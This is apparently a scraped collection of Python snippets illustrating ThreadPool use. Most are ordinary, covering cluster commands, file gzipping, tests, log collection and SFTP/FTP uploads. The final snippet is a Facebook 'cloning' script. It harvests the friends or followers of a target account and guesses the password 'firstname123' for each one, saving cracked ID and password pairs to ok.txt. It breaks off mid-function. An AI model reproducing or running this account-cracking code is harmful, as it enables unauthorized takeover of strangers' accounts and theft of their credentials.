def run_command(self, command, *args, **opts):
        if len(self.members) <= 0:
            raise TomcatError("Cluster has no members")
        hosts = opts.setdefault('hosts', self.members.keys())
        threads = opts.setdefault('threads',
                      min(self.member_count(), self.max_threads))
        abort_on_error = opts.setdefault('abort_on_error', False)
        if abort_on_error:
            abort = Value('b', 0)

        def run_cmd(host):
            try:
                if abort_on_error and abort.value:
                    raise TomcatError('Aborted')
                self.log.debug("Performing %s%s on %s", command, args, host)
                self._run_progress_callback(event=events.CMD_START,
                        command=command, args=args, node=host)

                rv = getattr(self.members[host], command)(*args)

                self._run_progress_callback(event=events.CMD_END,
                        command=command, args=args, node=host)
            except Exception as e:
                if abort_on_error:
                    abort.value = True
                rv = e
            return (host, rv)

        pool = ThreadPool(processes=threads)
        return ClusterCommandResults(pool.map(run_cmd, hosts))
    def run(self):
        """

        :return:
        """

        kind = self.options.get("PaE.cores", "thread")
        if kind == "thread":
            from multiprocessing.pool import ThreadPool as Pool
        elif kind == "process":
            from multiprocessing import Pool
        else:
            log.fatal('You selected an unknown threading method: %s. Only "thread" or "process" are supported' % kind)
            return self._memory

        import multiprocessing

        max_threads = self.options.get("PaE.cores", multiprocessing.cpu_count())
        pool = Pool(max_threads)

        buckets = self._prepare()

        for b in buckets:
            updates = pool.map(self.execute_node, b)
            for update in updates:
                self._memory.update(update)

        return self._memory
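A self-contained sketch of the pool-selection pattern above, assuming a hypothetical kind flag and a square() worker; both pool classes expose the same map interface, so the calling code stays unchanged:

def make_pool(kind, workers):
    # Pick the pool implementation by name; both expose the same API.
    if kind == "thread":
        from multiprocessing.pool import ThreadPool as Pool
    elif kind == "process":
        from multiprocessing import Pool
    else:
        raise ValueError("unknown pool kind: %r" % kind)
    return Pool(workers)

def square(x):
    return x * x

if __name__ == "__main__":
    pool = make_pool("thread", 4)
    print(pool.map(square, range(8)))  # [0, 1, 4, 9, 16, 25, 36, 49]
    pool.close()
    pool.join()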
Example #3
def get_pokemons(initial_latitude, initial_longitude):
    full_path = os.path.realpath(__file__)
    (path, filename) = os.path.split(full_path)
    latitude, longitude = initial_latitude, initial_longitude
    args = get_args()
    if args.auto_refresh:
        global auto_refresh
        auto_refresh = int(args.auto_refresh) * 1000

    if args.ampm_clock:
        global is_ampm_clock
        is_ampm_clock = True

    pokemonsJSON = json.load(
        open(path + '/locales/pokemon.' + args.locale + '.json'))

    steplimit = int(args.step_limit)

    pool = ThreadPool(processes=1)
    results = []
    pokemons = {}

    async_result = pool.apply_async(process_step, (pokemonsJSON, latitude, longitude))
    results.append(async_result)

    pokemons.update(results[0].get())

    return pokemons
Example #4
    def copytree_and_gzip(self, source_dir, target_dir):
        """
        Copies the provided source directory to the provided target directory.

        Gzips JavaScript, CSS and HTML and other files along the way.
        """
        # Figure out what we're building...
        build_list = []
        # Walk through the source directory...
        for (dirpath, dirnames, filenames) in os.walk(source_dir):
            for f in filenames:
                # Figure out what is going where
                source_path = os.path.join(dirpath, f)
                rel_path = os.path.relpath(dirpath, source_dir)
                target_path = os.path.join(target_dir, rel_path, f)
                # Add it to our list to build
                build_list.append((source_path, target_path))

        logger.debug("Gzipping {} files".format(len(build_list)))

        # Build em all
        if not getattr(self, 'pooling', False):
            [self.copyfile_and_gzip(*u) for u in build_list]
        else:
            cpu_count = multiprocessing.cpu_count()
            logger.debug("Pooling build on {} CPUs".format(cpu_count))
            pool = ThreadPool(processes=cpu_count)
            pool.map(self.pooled_copyfile_and_gzip, build_list)
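A minimal, self-contained sketch of the same walk-then-pool pattern: collect (source, target) pairs, then gzip-copy them across a ThreadPool. The gzip_copy helper and directory layout here are illustrative assumptions, not the original copyfile_and_gzip.

import gzip
import os
import shutil
from multiprocessing.pool import ThreadPool

def gzip_copy(paths):
    # Copy one file, writing a gzip-compressed copy at the target path.
    source_path, target_path = paths
    os.makedirs(os.path.dirname(target_path), exist_ok=True)
    with open(source_path, "rb") as src, gzip.open(target_path + ".gz", "wb") as dst:
        shutil.copyfileobj(src, dst)

def copytree_gzip(source_dir, target_dir, processes=4):
    build_list = []
    for dirpath, dirnames, filenames in os.walk(source_dir):
        for f in filenames:
            rel_path = os.path.relpath(dirpath, source_dir)
            build_list.append((os.path.join(dirpath, f),
                               os.path.join(target_dir, rel_path, f)))
    pool = ThreadPool(processes=processes)
    pool.map(gzip_copy, build_list)
    pool.close()
    pool.join()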
Example #5
 def test_threadsafe(self):
     # Ensure that the eventdb is thread-safe by hammering on it with
     # multiple threads simultaneously. We should only get one positive.
     pool = ThreadPool(10)
     results = pool.map(self.event_db.check_event, repeat(self.event, 1000))
     self.assertEqual(results.count(True), 1)
     self.assertEqual(results.count(False), 999)
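The same hammering idea in isolation, as a runnable sketch: a toy, lock-protected "seen once" store stands in for the event_db above, and only one of 1000 concurrent checks should return True.

import threading
from itertools import repeat
from multiprocessing.pool import ThreadPool

class ToyEventDB(object):
    # Stand-in for the real event store: returns True only for the first caller.
    def __init__(self):
        self._seen = set()
        self._lock = threading.Lock()

    def check_event(self, event):
        with self._lock:
            if event in self._seen:
                return False
            self._seen.add(event)
            return True

db = ToyEventDB()
pool = ThreadPool(10)
results = pool.map(db.check_event, repeat("event-1", 1000))
assert results.count(True) == 1
assert results.count(False) == 999
pool.close()
pool.join()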
Example #6
def run_using_threadpool(fn_to_execute, inputs, pool_size):
  """For internal use only; no backwards-compatibility guarantees.

  Runs the given function on given inputs using a thread pool.

  Args:
    fn_to_execute: Function to execute
    inputs: Inputs on which given function will be executed in parallel.
    pool_size: Size of thread pool.
  Returns:
    Results retrieved after executing the given function on given inputs.
  """

  # ThreadPool crashes in old versions of Python (< 2.7.5) if created
  # from a child thread. (http://bugs.python.org/issue10015)
  if not hasattr(threading.current_thread(), '_children'):
    threading.current_thread()._children = weakref.WeakKeyDictionary()
  pool = ThreadPool(min(pool_size, len(inputs)))
  try:
    # We record and reset logging level here since 'apitools' library Beam
    # depends on updates the logging level when used with a threadpool -
    # https://github.com/google/apitools/issues/141
    # TODO: Remove this once above issue in 'apitools' is fixed.
    old_level = logging.getLogger().level
    return pool.map(fn_to_execute, inputs)
  finally:
    pool.terminate()
    logging.getLogger().setLevel(old_level)
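A hedged usage example for the helper above: the callable is applied to each input on the pool and the results come back in input order. The worker shown is hypothetical.

def word_length(word):
    return len(word)

# Assumes run_using_threadpool from above is in scope.
lengths = run_using_threadpool(word_length, ["alpha", "beta", "gamma"], pool_size=4)
print(lengths)  # [5, 4, 5]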
	def _test_monitor_tables_locking_errors(self):
		"""Test that intensive read/write operations to the MySQL Monitor tables
		do not trigger locking errors.

		This test will be successful if there will be no generated error at
		the end.
		"""

		# Setting these variables will cause the Monitor to connect more
		# frequently to the backend hosts to check their health, thus increasing
		# the probability of locking errors to appear.
		self.run_query_proxysql_admin("UPDATE global_variables SET variable_value=100 WHERE variable_name='mysql-monitor_connect_interval'")
		self.run_query_proxysql_admin("UPDATE global_variables SET variable_value=100 WHERE variable_name='mysql-monitor_ping_interval'")
		self.run_query_proxysql_admin("LOAD MYSQL VARIABLES TO RUNTIME")

		queries = []
		q1 = "select * from monitor.mysql_server_connect_log ORDER BY RANDOM() LIMIT 10"
		q2 = "select * from monitor.mysql_server_ping_log ORDER BY RANDOM() LIMIT 10"
		for _ in xrange(10000):
			queries.append(random.choice([q1, q2]))

		pool = ThreadPool(processes=5)
		pool.map(self.run_query_proxysql_admin, queries)

		# If we reached this point without an error, it means that the test
		# has passed.
		self.assertEqual(1, 1)
Example #8
def get_available_google_ips(seeds, threads=None, max=None):
    global print_progress
    threads = threads if threads else (500 if monkey else 10)
    max = max if max else 50
    print_progress = print_progress_builder(max)
    gen = random_ip_generator(seeds)
    pool = ThreadPool(processes=threads)
    available_ips = []
    ips  = set()
    emptyCount = 0
    while len(available_ips) <= max:
        latent_ips = [gen.next() for _ in range(threads)]
        print '%s' % latent_ips
        latent_ips=set(latent_ips).difference(ips);
        print '%s' % latent_ips
        if not latent_ips :
           print "emptyCount:%s" % emptyCount
           if emptyCount > 1 :
             break
           emptyCount += 1
           continue
        results = pool.map(ping, latent_ips)
        for ip, dt in results:
            if dt > 0:
                if ip in ips:
                    continue;
                available_ips.append((ip, dt))
            ips.add(ip)
    sorted_ips = map(lambda x: x[0],
                     sorted(available_ips,
                            lambda (_, a), (__, b): bi_value(a - b)))
    return sorted_ips
def fetch_plugins(old_index):
    ans = {}
    pool = ThreadPool(processes=10)
    entries = tuple(parse_index())
    result = pool.map(partial(parallel_fetch, old_index), entries)
    for entry, plugin in zip(entries, result):
        if isinstance(plugin, dict):
            ans[entry.name] = plugin
        else:
            if entry.name in old_index:
                ans[entry.name] = old_index[entry.name]
            log('Failed to get plugin', entry.name, 'at', datetime.utcnow().isoformat(), 'with error:')
            log(plugin)
    # Move staged files
    for plugin in ans.itervalues():
        if plugin['file'].startswith('staging_'):
            src = plugin['file']
            plugin['file'] = src.partition('_')[-1]
            os.rename(src, plugin['file'])
    raw = bz2.compress(json.dumps(ans, sort_keys=True, indent=4, separators=(',', ': ')))
    atomic_write(raw, PLUGINS)
    # Cleanup any extra .zip files
    all_plugin_files = {p['file'] for p in ans.itervalues()}
    extra = set(glob.glob('*.zip')) - all_plugin_files
    for x in extra:
        os.unlink(x)
    return ans
Example #10
def show_video_stats(options):
    #video_page_urls = get_video_page_urls()
    #for video_page_url in video_page_urls:
    #    print get_video_data(video_page_url)
    pool = Pool(options.workers)
    video_page_urls = get_video_page_urls()
    results = sorted(pool.map(get_video_data, video_page_urls), key=lambda video: video[options.sort],
                     reverse=True)
    print len(results)
    max = options.max
    if max is None or max > len(results):
        max = len(results)
    if options.csv:
        print(u'"title","speakers", "views","likes","dislikes"')
    else:
        print(u'Views  +1  -1 Title (Speakers)')
    for i in range(max):
        if options.csv:
            print(u'"{0}","{1}",{2},{3},{4}'.format(
                results[i]['title'], ', '.join(results[i]['speakers']), results[i]['views'],
                results[i]['likes'], results[i]['dislikes']))
        else:
            print(u'{0:5d} {1:3d} {2:3d} {3} ({4})'.format(
                results[i]['views'], results[i]['likes'], results[i]['dislikes'], results[i]['title'],
                ', '.join(results[i]['speakers'])))
Example #11
    def __init__(self):
        super(Foo,self).__init__(400,400)
        l = pyglet.text.Label('FOOBAR',font_name="Courier Sans",font_size=20,x=self.width//2,y=self.height//2,multiline=True,width=200)


        pool = ThreadPool(processes=1)
        self.r = pool.apply_async(foo)


        @self.event
        def on_key_press(s,m):
            if s == pyglet.window.key.C:
                print("EXTERNAL")
                l.text = self.r.get()


        @self.event
        def on_draw():
            self.clear()
            
            l.draw()
            count = 10
            offset =(2*pi)/ 10.0
            for i in range(count):
                line((200,200),(200+cos(offset*i)*100,200+sin(offset*i)*100))

        pyglet.app.run()
    def testParallelTableUploadAndDownloadTunnel(self):
        p = 'ds=test'

        table, data = self._gen_table(partition=p.split('=', 1)[0], partition_type='string',
                                      partition_val=p.split('=', 1)[1])
        self.assertTrue(table.exist_partition(p))
        records = [table.new_record(values=d) for d in data]

        n_blocks = 5
        blocks = list(range(n_blocks))
        n_threads = 2
        thread_pool = ThreadPool(n_threads)

        def gen_block_records(block_id):
            c = len(data)
            st = int(c / n_blocks * block_id)
            if block_id < n_blocks - 1:
                ed = int(c / n_blocks * (block_id + 1))
            else:
                ed = c
            return records[st: ed]

        def write(w):
            def inner(arg):
                idx, r = arg
                w.write(idx, r)
            return inner

        with table.open_writer(partition=p, blocks=blocks) as writer:
            thread_pool.map(write(writer), [(i, gen_block_records(i)) for i in blocks])

        for step in range(1, 4):
            reads = []
            expected = []

            with table.open_reader(partition=p) as reader:
                count = reader.count

                for i in range(n_blocks):
                    start = int(count / n_blocks * i)
                    if i < n_blocks - 1:
                        end = int(count / n_blocks * (i + 1))
                    else:
                        end = count
                    for record in reader[start:end:step]:
                        reads.append(record)
                    expected.extend(data[start:end:step])

            self.assertEqual(len(expected), len(reads))
            for val1, val2 in zip(expected, [r.values for r in reads]):
                for it1, it2 in zip(val1[:-1], val2[:-1]):
                    if isinstance(it1, dict):
                        self.assertEqual(len(it1), len(it2))
                        self.assertTrue(any(it1[k] == it2[k] for k in it1))
                    elif isinstance(it1, list):
                        self.assertSequenceEqual(it1, it2)
                    else:
                        self.assertEqual(it1, it2)

        table.drop()
Example #13
    def _fit(self, dataset):
        est = self.getOrDefault(self.estimator)
        epm = self.getOrDefault(self.estimatorParamMaps)
        numModels = len(epm)
        eva = self.getOrDefault(self.evaluator)
        tRatio = self.getOrDefault(self.trainRatio)
        seed = self.getOrDefault(self.seed)
        randCol = self.uid + "_rand"
        df = dataset.select("*", rand(seed).alias(randCol))
        condition = (df[randCol] >= tRatio)
        validation = df.filter(condition).cache()
        train = df.filter(~condition).cache()

        def singleTrain(paramMap):
            model = est.fit(train, paramMap)
            metric = eva.evaluate(model.transform(validation, paramMap))
            return metric

        pool = ThreadPool(processes=min(self.getParallelism(), numModels))
        metrics = pool.map(singleTrain, epm)
        train.unpersist()
        validation.unpersist()

        if eva.isLargerBetter():
            bestIndex = np.argmax(metrics)
        else:
            bestIndex = np.argmin(metrics)
        bestModel = est.fit(dataset, epm[bestIndex])
        return self._copyValues(TrainValidationSplitModel(bestModel, metrics))
  def collect_logs(self):
    """Collect all the microservice log files."""
    log_dir = os.path.join(self.options.log_dir, 'service_logs')
    if not os.path.exists(log_dir):
      os.makedirs(log_dir)

    def fetch_service_log(service):
      try:
        logging.debug('Fetching logs for "%s"...', service)
        deployer = (self if service in HALYARD_SERVICES
                    else self.__spinnaker_deployer)
        deployer.do_fetch_service_log_file(service, log_dir)
      except Exception as ex:
        message = 'Error fetching log for service "{service}": {ex}'.format(
            service=service, ex=ex)
        if ex.message.find('No such file') >= 0:
          message += '\n    Perhaps the service never started.'
          # dont log since the error was already captured.
        else:
          logging.error(message)
          message += '\n{trace}'.format(
              trace=traceback.format_exc())

        write_data_to_secure_path(
            message, os.path.join(log_dir, service + '.log'))

    logging.info('Collecting server log files into "%s"', log_dir)
    all_services = list(SPINNAKER_SERVICES)
    all_services.extend(HALYARD_SERVICES)
    thread_pool = ThreadPool(len(all_services))
    thread_pool.map(fetch_service_log, all_services)
    thread_pool.terminate()
Example #15
def analyze_commits(project_name, target_repo, existing_target_branches, fork_list):
    print 'Analyzing commits'

    pool = ThreadPool(processes=10)

    existing_target_commits = []

    for fork_repo in fork_list:
        for target_branch in existing_target_branches:

            print '    Analyzing %s (branch: %s) ' % (fork_repo.full_name, target_branch),
            fork_repo_commits = fork_repo.get_commits(sha=target_branch)

            max_commits_to_analyze = 30
            analyzed_commits = 0

            fork_commits_to_analyze = []

            for fork_comm in fork_repo_commits:
                if analyzed_commits == max_commits_to_analyze:
                    break

                fork_commits_to_analyze.append(fork_comm)

                analyzed_commits += 1

            partial_c_in_root = functools.partial(commit_is_in_root,
                                                  existing_target_commits,
                                                  target_repo, fork_repo)

            pool.map(partial_c_in_root, fork_commits_to_analyze)
            print
Example #16
    def search(self,button):
        print 'search clicked'
        self.popup_menu=Gtk.Menu()
        s=self.search_field.get_text()
        if s:
            #thread.start_new_thread(scrape_test.main,(s,))
            pool = ThreadPool(processes=1)
            async_result = pool.apply_async(scrape_test.main, (s,)) # tuple of args for foo
            self.href, title, size, seeders, leechers= async_result.get() 
            self.popup_menu.set_title("Torrents")
            print self.popup_menu.get_title()
            for i in range(len(self.href)):
                #print str(i+1)+'. '+title[i]+' '+size[i]+' '+seeders[i]+' '+leechers[i]
                menu_item = Gtk.MenuItem(str(i+1)+'. '+title[i]+'     '+size[i]+' '+seeders[i]+'-SEEDERS '+leechers[i]+'-LEECHERS')
                menu_item.connect("activate",self.item_activated,i)
                self.popup_menu.append(menu_item)
            self.popup_menu.show_all()
            self.popup_menu.popup(None, None, None, None, 0, Gtk.get_current_event_time())

        else:
            print 'EMPTY'
            self.label.set_text("Search field is empty")
            #self.dialog=self.builder.get_object('dialog1')
            v=self.dialog.run()
            if v==1:
                self.dialog.hide()
Example #17
	def StartInfrastructure(inf_id, auth):
		"""
		Start all virtual machines in an infrastructure previously stopped.

		Args:

		- inf_id(str): infrastructure id.
		- auth(Authentication): parsed authentication tokens.

		Return(str): error messages; empty string means all was ok.
		"""

		InfrastructureManager.logger.info("Starting the infrastructure id: " + str(inf_id))

		sel_inf = InfrastructureManager.get_infrastructure(inf_id, auth)
		exceptions = []
		if Config.MAX_SIMULTANEOUS_LAUNCHES > 1:
			pool = ThreadPool(processes=Config.MAX_SIMULTANEOUS_LAUNCHES)
			pool.map(
				lambda vm: InfrastructureManager._start_vm(vm, auth, exceptions), 
				reversed(sel_inf.get_vm_list())
				)
		else:
			for vm in sel_inf.get_vm_list():
				InfrastructureManager._start_vm(vm, auth, exceptions)

		if exceptions:
			msg = ""
			for e in exceptions:
				msg += str(e) + "\n"
			raise Exception("Error starting the infrastructure: %s" % msg)

		InfrastructureManager.logger.info("Infrastructure successfully restarted")
		return ""
    def handle_noargs(self, **options):
        mimetypes.init()

        locked_print("===> Syncing static directory")
        pool = ThreadPool(20)

        # Sync every file in the static media dir with S3
        def pooled_sync_file(base, filename):
            pool.apply_async(self.sync_file, args=[base, filename])

        self.walk_tree([conf.SIMPLESTATIC_DIR], pooled_sync_file)
        pool.close()
        pool.join()
        locked_print("===> Static directory syncing complete")

        locked_print("===> Compressing and uploading CSS and JS")
        pool = ThreadPool(20)

        # Iterate over every template, looking for SimpleStaticNode
        def pooled_handle_template(base, filename):
            pool.apply_async(self.handle_template, args=[base, filename])

        self.walk_tree(list(settings.TEMPLATE_DIRS), pooled_handle_template)
        pool.close()
        pool.join()
        locked_print("===> Finished compressing and uploading CSS and JS")
Example #19
def svnup(site, commitmessage):
    svn = Popen(['svn', 'status'], cwd=site['localdir'], stdout=PIPE, stderr=PIPE)
    
    
    files = []
    for line in svn.stdout.readlines():
        lineprefix = 'A  +    '
        
        if line.startswith('M') or line.startswith('A'):
            line = line[len(lineprefix):]
            line = line.rstrip('\r').rstrip('\n')
            files.append(line)
        elif (line.startswith('?') 
              or line.startswith('C') 
              or line.startswith('!')):
            call(['svn', 'status'], cwd=site['localdir'])
            exit(1)

    if len(files):
        print 'Uploading: ', '\n'.join(files)
    else:
        print 'Nothing to Update'
        call(['svn', 'status'], cwd=site['localdir'])
        exit(0)
    
    stdout, stderr = svn.communicate()
    
    if stderr:
        print stderr
        exit(1)
    
    def upload(filename):
        remotefilename = path.join(site['remotedir'], filename)
        remoteaddress = 'ftp://%s%s' % (site['host'], remotefilename)
        
        if not path.isdir(filename):
            print 'Uploading: \n', filename
            exitcode = call(['curl',
                  '--progress-bar',
                  '-T', filename, 
                  '--ftp-create-dirs',
                  '--user', '%s:%s' % (site['username'], site['password']),
                  remoteaddress],
                  cwd = site['localdir'])
            
            print ''
            if exitcode:
                print 'Error in uploading "%s"' % filename
                print 'Destination is "%s"' % remoteaddress
                exit(1)
    
    pool = ThreadPool(settings['concurrentConnections'])
    pool.map(upload, files)
    pool.close()
    pool.join()

    
    call(['svn', 'commit', '-m', commitmessage], cwd=site['localdir'])
	def read(self, sftppath, localPath = None, numParallelConnections = 1):
		if localPath is None:
			localPath = os.getcwd() # local path - can be changed later
		sftp = paramiko.SFTPClient.from_transport(self.transport)
		if (numParallelConnections > 1):
			pool = ThreadPool(numParallelConnections)

		def getFile(sftppath, localpath):
			pconnection = SFTPConnection(self.connectionInfo)
			pconnection.connect()
			psftp = paramiko.SFTPClient.from_transport(pconnection.transport)
			psftp.get(sftppath, localpath)
			psftp.close()
			pconnection.close()

		def recursiveRead(sftp, sftppath, localPath):
			fileattr = sftp.lstat(sftppath)
			if not stat.S_ISDIR(fileattr.st_mode): #it is a file
				if (numParallelConnections > 1):
					pool.apply_async(getFile, args= (sftppath, os.path.join(localPath, os.path.basename(sftppath))))
				else:
					sftp.get(sftppath, os.path.join(localPath, os.path.basename(sftppath)))
			else: #it is a directory
				try: #creating local directory, using try-catch to handle race conditions
					os.makedirs(os.path.join(localPath, os.path.basename(sftppath)))
				except OSError as exception:
					if exception.errno != errno.EEXIST:
						raise
				for file in sftp.listdir_attr(sftppath):
					recursiveRead(sftp, os.path.join(sftppath, file.filename), os.path.join(localPath, os.path.basename(sftppath)))
		recursiveRead(sftp, sftppath, localPath)
		sftp.close()
		if (numParallelConnections > 1):
			pool.close()
			pool.join()
Example #21
    def monitorthread(self):
        stock_codes = []
        for item in self.conn.mystock.todaydata.find():

            stock_codes.append(item['code'])
        pool = ThreadPool(40)
        pool.map(self.proxy, stock_codes)
Example #22
  def run_test_case_list(
      self, test_case_list, max_concurrent, timeout_ok=False,
      max_retries=0, retry_interval_secs=5, full_trace=False):
    """Run a list of test cases.

    Args:
      test_case_list: [list of OperationContract] Specifies the tests to run.
      max_concurrent: [int] The number of cases that can be run concurrently.
      timeout_ok: [bool] If True then individual tests can timeout and still
         be considered having a successful AgentOperationStatus.
      max_retries: [int] Number of independent retries permitted on
         individual operations if the operation status fails. A value of 0
         indicates that a test should only be given a single attempt.
      retry_interval_secs: [int] Time between retries of individual operations.
      full_trace: [bool] If True then provide detailed execution tracing.
    """
    num_threads = min(max_concurrent, len(test_case_list))
    pool = ThreadPool(processes=num_threads)
    def run_one(test_case):
      """Helper function to run individual tests."""
      self.run_test_case(
          test_case=test_case, timeout_ok=timeout_ok,
          max_retries=max_retries, retry_interval_secs=retry_interval_secs,
          full_trace=full_trace)

    self.logger.info(
        'Running %d tests across %d threads.',
        len(test_case_list), num_threads)
    pool.map(run_one, test_case_list)
    self.logger.info('Finished %d tests.', len(test_case_list))
Example #23
def bench_compression_comparison(n_chunks, df_length, append_mul, pool_size, pool_step, repeats,
                                 use_raw_lz4, use_HC):
    _str = construct_test_data(df_length, append_mul)
    chunk_size = len(_str) / 1024 ** 2.0
    _strarr = [_str] * n_chunks

    # Single threaded
    # ---------------
    measurements = bench_single(repeats, _strarr, use_HC)
    print_results(1, chunk_size, n_chunks, chunk_size*n_chunks, measurements)
    single_mean = np.mean(measurements)

    # Multi-threaded
    # --------------
    for sz in range(2, pool_size + 1, pool_step):
        if use_raw_lz4:
            pool = ThreadPool(sz)
        else:
            pool = None
            c.set_compression_pool_size(sz)
        measurements = bench_multi(repeats, _strarr, use_HC, pool=pool)
        print_results(sz, chunk_size, n_chunks, chunk_size * n_chunks, measurements, compare=single_mean)
        if pool:
            pool.close()
            pool.join()
    print("")
    def extract(url):
        """TODO: Docstring for extract.
        :returns: TODO

        """
        try:
            r = rs.get(url)
            soup = bs(r.text, 'html.parser')
            tr_list = soup.tbody.find_all('tr')
        except AttributeError:
            print r
            return None
        info_list = []
        for tr in tr_list:
            td_list = tr.find_all('td')
            if td_list[2].text.strip() == u'高匿名' and\
                    'HTTP' in td_list[3].text.strip(' ').split(',') and\
                    'GET' in td_list[4].text.strip(' ').split(','):
                infos = list()
                infos.append(td_list[0].text.strip())
                infos.append(td_list[1].text.strip())
                infos.append(td_list[6].text.strip()[:-1])
                if td_list[7].text.find(u'小时') != -1:
                    infos.append(float(td_list[7].text[:-3]) * 3600)
                else:
                    infos.append(float(td_list[7].text[:-3]) * 60)
                info_list.append(infos)
        p = Pool(len(info_list))
        proxy_list = p.map(wrapper, info_list)
        p.close()
        return proxy_list
def retrieve_html_exercises(exercises: [str], lang: str, force=False) -> (str, [str]):
    """
    Return a 2-tuple with the first element pointing to the path the exercise files are stored,
    and the second element a list of exercise ids that have html exercises.
    """
    BUILD_DIR = os.path.join(os.getcwd(), "build", lang)
    EN_BUILD_DIR = os.path.join(os.getcwd(), "build", "en")
    EXERCISE_DOWNLOAD_URL_TEMPLATE = ("https://es.khanacademy.org/"
                                      "khan-exercises/exercises/{id}.html?lang={lang}")

    def _download_html_exercise(exercise_id):
        """
        Download an exercise and return its exercise id *if* the
        downloaded url from the selected language is different from the english version.
        """
        lang_url = EXERCISE_DOWNLOAD_URL_TEMPLATE.format(id=exercise_id, lang=lang)
        en_url = EXERCISE_DOWNLOAD_URL_TEMPLATE.format(id=exercise_id, lang="en")
        try:
            lang_file = download_and_cache_file(lang_url, cachedir=BUILD_DIR, ignorecache=force)
            en_file = download_and_cache_file(en_url, cachedir=EN_BUILD_DIR, ignorecache=force)
            if not filecmp.cmp(lang_file, en_file, shallow=False):
                return exercise_id
        except urllib.error.HTTPError:
            return None

    pool = Pool(processes=NUM_PROCESSES)
    translated_exercises = pool.map(_download_html_exercise, exercises)
    # filter out Nones, since it means we got an error downloading those exercises
    result = [e for e in translated_exercises if e]
    return (BUILD_DIR, result)
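A small sketch of the "map, then drop the failures" pattern used above, with a toy worker that returns None on error instead of downloading anything:

from multiprocessing.pool import ThreadPool

def fetch(item):
    # Hypothetical worker: pretend every odd item fails.
    return item if item % 2 == 0 else None

pool = ThreadPool(processes=4)
results = pool.map(fetch, range(10))
successes = [r for r in results if r is not None]  # filter out the Nones
pool.close()
pool.join()
print(successes)  # [0, 2, 4, 6, 8]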
Example #26
    def _load_lyrics(self, songdict):
        total = []
        for songlist in songdict.values():
            total += songlist

        pool = ThreadPool()
        pool.map(Song.load, total)
Example #27
def generate_my_keys(the_n, the_e, the_d):
    pool = ThreadPool(processes=1)

    async_result = pool.apply_async(newKey, (the_n, the_e, the_d))  # tuple of args for foo

    (n, e, d) = async_result.get()  # get the return value from your function.
    return (n, e, d)
    def _test_herd_management(self, cache):
        globals()['call_count'] = 0

        def test_callable(v):
            global call_count
            call_count += 1

            sleep(0.1)
            return v

        pool = ThreadPool(processes=10)
        processes = []
        for _ in xrange(10):
            to_func = {
                'key': self._test_key,
                'callback': test_callable,
                'callback_params': {'v': 17},
            }

            async_result = pool.apply_async(
                cache.get_or_set, kwds=to_func
            )
            processes.append(async_result)

        results = []
        for thread in processes:
            thread.wait()
            results.append(thread.get())

        # Checking that callable method was applied only once
        self.assertEqual(globals()['call_count'], 1)

        # Checking results - they all should be the same
        self.assertEqual(results, [17] * 10)
Example #29
def resolve_playlist(url):
    resolve_pool = ThreadPool(processes=16)
    logger.info("Resolving YouTube-Playlist '%s'", url)
    playlist = []

    page = 'first'
    while page:
        params = {
            'playlistId': url,
            'maxResults': 50,
            'key': yt_key,
            'part': 'contentDetails'
        }
        if page and page != "first":
            logger.debug("Get YouTube-Playlist '%s' page %s", url, page)
            params['pageToken'] = page

        result = session.get(yt_api_endpoint+'playlistItems', params=params)
        data = result.json()
        page = data.get('nextPageToken')

        for item in data["items"]:
            video_id = item['contentDetails']['videoId']
            playlist.append(video_id)

    playlist = resolve_pool.map(resolve_url, playlist)
    resolve_pool.close()
    return [item for item in playlist if item]
def test(my_test_cases):
    try:
        logfile = edex_tools.find_latest_log()
    except OSError as e:
        log.error('Error fetching latest log file - %s', e)
        return {}

    total_timeout = 0
    count = 0
    sc = {}
    pool = ThreadPool(MAX_THREADS)

    pool.map(execute_test, my_test_cases)

    for tc in my_test_cases:
        total_timeout += tc.timeout
        count += tc.count

    # wait for all ingestion to complete
    if not edex_tools.watch_log_for('EDEX - Ingest complete for file', logfile=logfile,
                                    expected_count=count, timeout=total_timeout):
        log.error('Timed out waiting for ingest complete message')

    log.info('All files ingested, testing results')

    for tc in pool.map(evaluate_test_case, test_cases):
        sc.update(tc)

    return sc
Example #31
def l_menu_select():
    select = raw_input('\nChoose Option >>> ')
    id = []
    oks = []
    cps = []
    if select == '1':
        os.system('clear')
        logo()
        print ''
        os.system('echo -e "\t    Public ID Cloning " | lolcat')
        print ''
        idt = raw_input(' Put Id/user :  '******'clear')
        logo()
        print ''
        os.system('echo -e "\t    Gathering Information " | lolcat')
        print ''
        try:
            r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
            q = json.loads(r.text)
            os.system('clear')
            logo()
            print ''
            os.system('echo -e "\t    Public ID Cloning " | lolcat')
            print ''
            print ' Target user : '******'name']
        except (KeyError, IOError):
            print ''
            print '\n\t    \x1b[1;31m Logged in id has checkpoint\x1b[0;97m'
            print ''
            raw_input('\nPress enter to back ')
            l_menu()

        r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '2':
        os.system('clear')
        logo()
        print ''
        os.system('echo -e "\t    Public ID Cloning " | lolcat')
        print ''
        idt = raw_input(' Put Id/user : '******'clear')
        logo()
        print ''
        os.system('echo -e "\t    Gathering Information " | lolcat')
        print ''
        try:
            r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token, headers=header)
            q = json.loads(r.text)
            os.system('clear')
            logo()
            print ''
            os.system('echo -e "\t    Followers Cloning " | lolcat')
            print ''
            print ' Target user : '******'name']
        except (KeyError, IOError):
            print ''
            print '\n\t    \x1b[1;31m Logged in id has checkpoint\x1b[0;97m'
            print ''
            raw_input('\n Press enter to back ')
            l_menu()

        r = requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=5000', headers=header)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '3':
        method_menu()
    elif select == '4':
        logout()
    else:
        print ''
        print '\t    ' + c + 'Select valid method' + c2
        print ''
        l_menu_select()
    print ' Total IDs : ' + str(len(id))
    time.sleep(0.5)
    print ' The process is running in background'
    print ''
    print 47 * '-'
    print ''

    def main(arg):
        user = arg
        uid, name = user.split('|')
        try:
            pass1 = name + '123'
            data = requests.get('http://mbasic.facebook.com/localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass1 + '\x1b[0;97m'
                ok = open('ok.txt', 'a')
                ok.write(uid + ' | ' + pass1 + '\n')
                ok.close()
                oks.append(uid + pass1)
            elif 'www.facebook.com' in q['error']:
